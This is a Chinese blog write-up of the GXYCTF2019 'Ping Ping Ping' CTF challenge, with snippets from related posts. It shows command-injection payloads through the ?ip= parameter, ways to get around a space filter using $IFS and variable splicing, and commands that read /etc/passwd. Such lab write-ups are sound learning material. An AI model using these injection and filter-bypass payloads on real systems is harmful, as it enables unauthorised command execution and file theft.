BUUCTF刷题----------[GXYCTF2019]Ping Ping Ping

于 2022-03-10 08:49:00 发布
阅读量209 收藏
点赞数
分类专栏: CTF笔记 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45616570/article/details/123392253
版权

BUUCTF刷题----------[GXYCTF2019]Ping Ping Ping

不定时更新

题目

image-20220310082212381

image-20220310082254821

考点

命令执行和过滤

解题思路

从题目可以看出需要执行?ip=

解题过程

构造payload

http://053b3284-a6e4-4bbb-8c63-265b2267f9e2.node4.buuoj.cn:81/?ip=127.0.0.1

查看文件目录

http://053b3284-a6e4-4bbb-8c63-265b2267f9e2.node4.buuoj.cn:81/?ip=127.0.0.1|ls

image-20220310082623158

发现两个PHP文件

查看文件

http://053b3284-a6e4-4bbb-8c63-265b2267f9e2.node4.buuoj.cn:81/?ip=127.0.0.1|cat index.php

image-20220310082822232

出现空格过滤,CTF中linux系统空格替换的类型有:

{cat,flag.txt} 
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
kg=$'\x20flag.txt'&&cat$kg
(\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过)

CTF中Windows系统空格替换的类型有:

(实用性不是很广,也就type这个命令可以用)
type.\flag.txt
type,flag.txt
echo,123456

执行新的payload:

http://053b3284-a6e4-4bbb-8c63-265b2267f9e2.node4.buuoj.cn:81/?ip=127.0.0.1|cat$IFS$9index.php

image-20220310083112579

发现index.php中对一些符号进行了过滤:

echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)

查看flag.php

执行payload:

http://053b3284-a6e4-4bbb-8c63-265b2267f9e2.node4.buuoj.cn:81/?ip=127.0.0.1|cat$IFS$9flag.php

image-20220310083329291

发现题目对flag进行了过滤,但是从从index.php文件中未对;进行过滤,所以我们可以根据PHP定义变量去替换flag中的一个字母:

http://053b3284-a6e4-4bbb-8c63-265b2267f9e2.node4.buuoj.cn:81/?ip=127.0.0.1;s=g;cat$IFS$9fla$s.php

注意此处对flag进行了注释,需要F12查看源码
注意此处对flag进行了注释,需要F12查看源码[外链图片转存中…(img-2Pb5AFZh-1646873246328)]

image-20220310084618575

r1ng_13
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[buuoj][GXYCTF2019]Ping Ping Ping
qq_42250840的博客
07-07 356
知识点: linux的命令执行 当应用需要调用一些外部程序去处理内容的情况下,就会用到一些 执行系统命令的函数。如果用户可以控制命令执行函数中的参数时, 就可以注入一些恶意的系统命令到正常命令,造成命令执行漏洞 绕过空格、敏感字符、连接符 复现: 尝试?ip=127.0.0.1;ls 找到flag.php、index.php 尝试访问: ?ip=127.0.0.1 ;cat flag.php 空格被过滤, 1.%20(space)、%09(tab)、$IFS$9、 IFS、{IFS} 2.使用&l
BUUCTF——web([GXYCTF2019]Ping Ping Ping、[极客大挑战 2019]Knife、[极客大挑战 2019]Http)
LizePing_的博客
07-16 287
BUUCTF-web[GXYCTF2019]Ping Ping Ping做题思路 [GXYCTF2019]Ping Ping Ping 做题思路 打开看题目 熟悉的样子,ping本地加查看命令,得到两个php文件 接着查看一下文件内容 奇奇怪怪的是,我发现空格被过滤了。 好家伙,百度找了找,直呼好家伙, 构造payload, ...
BUUCTF Web pingpingping
CrotZZ的博客
07-03 457
打开后 没什么提示 试了下cat flag,空格好像是被过滤了 去空格,flag也被过滤 根据题目是ping 所以得先ip=127.0.0.1返回结果是这样的 ls看有什么文件,flag已经被过滤 试了下一些绕过空格的方法,得到index.php里面的内容,虽然有些看不懂但大致意思还是明白,空格、bash、命令里是否有flag 都被过滤 这里是用了echo$IFS9Y2F0IGZsYWcucGhw∣base649Y2F0IGZsYWcucGhw|base649Y2F0IGZsYWcucGh
buuctf-web-[GXYCTF2019]Ping Ping Ping-wp
居上
06-27 213
[GXYCTF2019]Ping Ping Ping 知识点 变量拼接 sh,bash下编码 绕过空格过滤 绕过关键字过滤 过程 主页: ?ip=127.0.0.1 ?ip=127.0.0.1;ls ?ip=127.0.0.1;cat flag.php 过滤了空格,使用$IFS$1来绕过 ?ip=127.0.0.1;cat$IFS$1flag.php 过滤了flag,但是可以查看下index.php ?ip=127.0.0.1;cat$IFS$1index.php |
BUUCTF刷题记录 Ping Ping Ping
m0_46576074的博客
05-16 1803
[GXYCTF2019]Ping Ping Ping 进入页面 然后/?ip=127.0.0.1|ls 进入 读取flag.php 再cat$IFS$1indnx.php 再变量拼接 ?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 转至 http://1d22a0a5-c6a0-43f1-8e52-e5a33ec7e044.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 再F12 ...
window下可用的arp-ping工具
最新发布
01-03
ARP-Ping工具在Windows操作系统中的应用 在计算机网络中,ARP(Address Resolution Protocol,地址解析协议)是一个重要的底层协议,用于将IP地址映射到物理MAC地址,以便数据能够在网络中正确传输。ARP-Ping是一种...
ping-pong-server
05-10
乒乓服务器 描述 多人游戏“乒乓球2D”的服务器部分 入门 这些说明将为您提供在本地计算机上运行并运行的项目的副本,以进行开发和测试。 先决条件 (与Node.js一起提供) 或者您可以使用像这样的云服务 ...
ping工具-服务器维护
11-15
"ping工具"是网络诊断中不可或缺的一个实用程序,主要用于测试网络连接的连通性和测量数据包从源到目的地的往返时间。在服务器维护过程中,它扮演着至关重要的角色,帮助管理员快速定位网络问题,确保服务的稳定运行...
python-ping:python ping
05-03
Python平使用python raw套接字Ping usage: sudo ping.py [-h] [--version] [-c COUNT] [-t TTL] [-s PACKETSIZE] [--timeout TIMEOUT] hostpositional arguments: host Target hostoptional arguments: -h, --help ...
解决 U-Boot ping不通虚拟机的问题
01-06
解决 U-Boot ping不通虚拟机的问题 在学习U-boot时遇到了开发板ping不通主机和虚拟机的问题,经上 网查资料和多次尝试后解决了问题,简单分享一下,希望有所帮助。 主机win10,使用的虚拟机是Ubuntu16.04, 开发板为...
每周刷题(四)
qidiandexiaowu
10-11 424
目录0×00 web1 [极客大挑战 2019]LoveSQL0×01 web2 [RoarCTF 2019]Easy Calc 0×00 web1 [极客大挑战 2019]LoveSQL 又是一道注入题。 我竟然使用万能密码登录成功了。 给了一串字符但是不知道是啥用。 但换个思维来说,这可能是可回显注入。 payload:http://e1455b99-b85f-4948-8f64-0865420f5f19.node3.buuoj.cn/check.php?username=1'&passwo
BUUCTFWeb:[GXYCTF2019]Ping Ping Ping
Pai_Space
02-10 607
${IFS}替换 $IFS$1替换 ${IFS替换 %20替换 <和<>重定向符替换 %09替换 /?ip= <pre>/?ip= <?php if(isset($_GET['ip'])){ $ip = $_GET['ip']; if(preg_match("/\&|\/|\?|\*|\<...
BUUCTF-WEB
ccfly1012的博客
11-02 3810
目录 [HCTF 2018]WarmUp [极客大挑战 2019]EasySQL 总结万能密码 [极客大挑战 2019]Havefun [强网杯 2019]随便注 [ACTF2020 新生赛]Include [SUCTF 2019]EasySQL [极客大挑战 2019]Secret File [ACTF2020 新生赛]Exec [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [HCTF 2018]WarmUp 打开网页,查看一下源代
2020-09-03签到赛
Kihyun_的博客
09-03 265
super_easy_web1P1P依旧开心哈哈哈Very_Ez_Unserialize super_easy_web <?php highlight_file('index.php'); include('flag.php'); //try to reach the flag in variable if(isset($_GET['a'])&&isset($_GET['b'])&&isset($_GET['c'])&&isset($_GET['d'].
第二十天 CTF初识
weixin_46653764的博客
06-26 727
一、记下一些不知道的小知识 (1)常见的备份文件后缀名有: .git .svn .swp .svn .~ .bak .bash_history 而 php的备份有两种:****.php~和.php.bak (2)去了解php的弱类型 (3)
CTF入门笔记之ping
qq_37410729的博客
11-02 4156
1.用命令行找flag文件 随便ping,然后跟ls 例如:1;ls 发现index.php文件 1;cat index.php 查看发现就是源网站。 那就向上找 1;ls …/ 继续向上找 直到1;ls …/…/…/ 发现flag 打开 1;cat …/…/…/flag 得到flag 2.绕过过滤打开文件 同样,先查看目录 payload:?ip=1;ls 发现两个文件,尝试直接打开index文件(虽然知道肯定不行) payload:?ip=1;cat index.php 果然不行
Web命令执行
qq_53086690的博客
06-16 384
利用通配符来执行命令 c=/?in/cat+/et?/passw? 可以当做/bin/cat/etc/passwd ?可以匹配任意字符 过滤空格的方法 %20(space)、%09(tab)、$IFS$9、 IFS、IFS 使用<或者<>来绕过空格 cat<a.txt 花括号扩展{,} {cat,/etc/passwd} $IFS 空格绕过 cat$IFS$1a.txt 变量控制 X=$'cat\x09./flag.php 关键词过滤 使用空变量 使用$*和$@,$x(x 代表 1
命令注入(DVWA+buuctf pingpingping
bin789456的博客
09-15 985
写在前面 命令注入漏洞和SQL注入、XSS漏洞很相似,也是由于开发人员考虑不周造成的,在使用web应用程序执行系统命令的时候对用户输入的字符未进行过滤或过滤不严格导致的,常发生在具有执行系统命令的web应用中,如内容管理系统(CMS)等。 也就是在cmd等等命令行执行位置可以使用一些trick,自然你也会想到在CTF中会伴随一些关键字的屏蔽,当然也有一些绕过技巧。 这里主要是dvwa上的命令注入和一道CTF例题来说明 DVWA命令注入 后台代码并未对用户输入的参数ip的值进行过滤就直接与ping命令进行拼接
CTF中,命令中空格被过滤的解决方法
m0_46315342的博客
08-20 2317
转载于: 作者:HyyMbb 链接:https://blog.csdn.net/a3320315/article/details/99773192 来源:CSDN博客
Linux Open-iSCSI 手册:iscsiadm 命令详解
9. **Advanced Configuration**章节则深入探讨更复杂的配置,例如iSCSI ping/Nop-Out设置和更换超时,这对于提高系统的可靠性和性能至关重要。 手册中详尽的步骤和示例使得即使对iscsiadm命令感到困惑的用户也能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值